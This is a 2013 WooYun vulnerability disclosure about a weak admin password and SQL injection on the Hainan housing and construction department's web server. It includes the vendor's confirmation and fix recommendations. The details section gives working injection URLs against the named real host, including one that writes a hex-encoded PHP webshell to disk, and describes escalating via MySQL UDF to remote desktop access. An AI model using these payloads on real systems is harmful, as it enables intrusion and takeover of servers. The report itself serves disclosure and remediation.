漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-044481
漏洞标题:海南省住房和城乡建设厅服务器弱口令及后台sql注射漏洞(root+system)
相关厂商:海南省住房和城乡建设厅
漏洞作者: 问天
提交时间:2013-12-01 20:23
修复时间:2014-01-15 20:24
公开时间:2014-01-15 20:24
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-01: 细节已通知厂商并且等待厂商处理中
2013-12-02: 厂商已经确认,细节仅向厂商公开
2013-12-12: 细节向核心白帽子及相关领域专家公开
2013-12-22: 细节向普通白帽子公开
2014-01-01: 细节向实习白帽子公开
2014-01-15: 细节向公众公开
简要描述:
海南省住房和城乡建设厅
详细说明:
http://www.hnjst.gov.cn:81
海南省住房和城乡建设厅网站服务器iAudit系统admin弱口令直接后台:
后台php字符型注射:
http://www.hnjst.gov.cn:81/admin/admin_user_edit.php?form_action=edit_user&user_name=j' and%090xa=0xb union /*!select*/ 1,2,user(),4,5,6,7,8,9,10,11 from `mysql`.`user`%23
得到mysql用户为root
结合
http://www.hnjst.gov.cn:81/phpinfo.php得到的web物理路径和操作系统windows2k3
直接
http://www.hnjst.gov.cn:81/admin/admin_user_edit.php?form_action=edit_user&user_name=j' and%090xa=0xb union /*!select*/ 1,2,0x(php一句话木马16进制串),4,5,6,7,8,9,10,11 /*!into*//*Y*/dumpfile/*Q*/'D:/iAuditCenter/console/u.php'%23
再上传得到大马,查看配置文件,利用mysql的udf就很方便的搞下远程3389权限
后台弱口令
漏洞证明:
修复方案:
1.强制用户使用复杂口令
2.修改后台的所有注入漏洞
3.去掉默认phpinfo.php页面
4.mysql数据库账户和运行用户降低权限
5.apache降低权限
版权声明:转载请注明来源 问天@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2013-12-02 22:09
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给海南分中心,由其后续联系网站管理单位处置。
最新状态:
暂无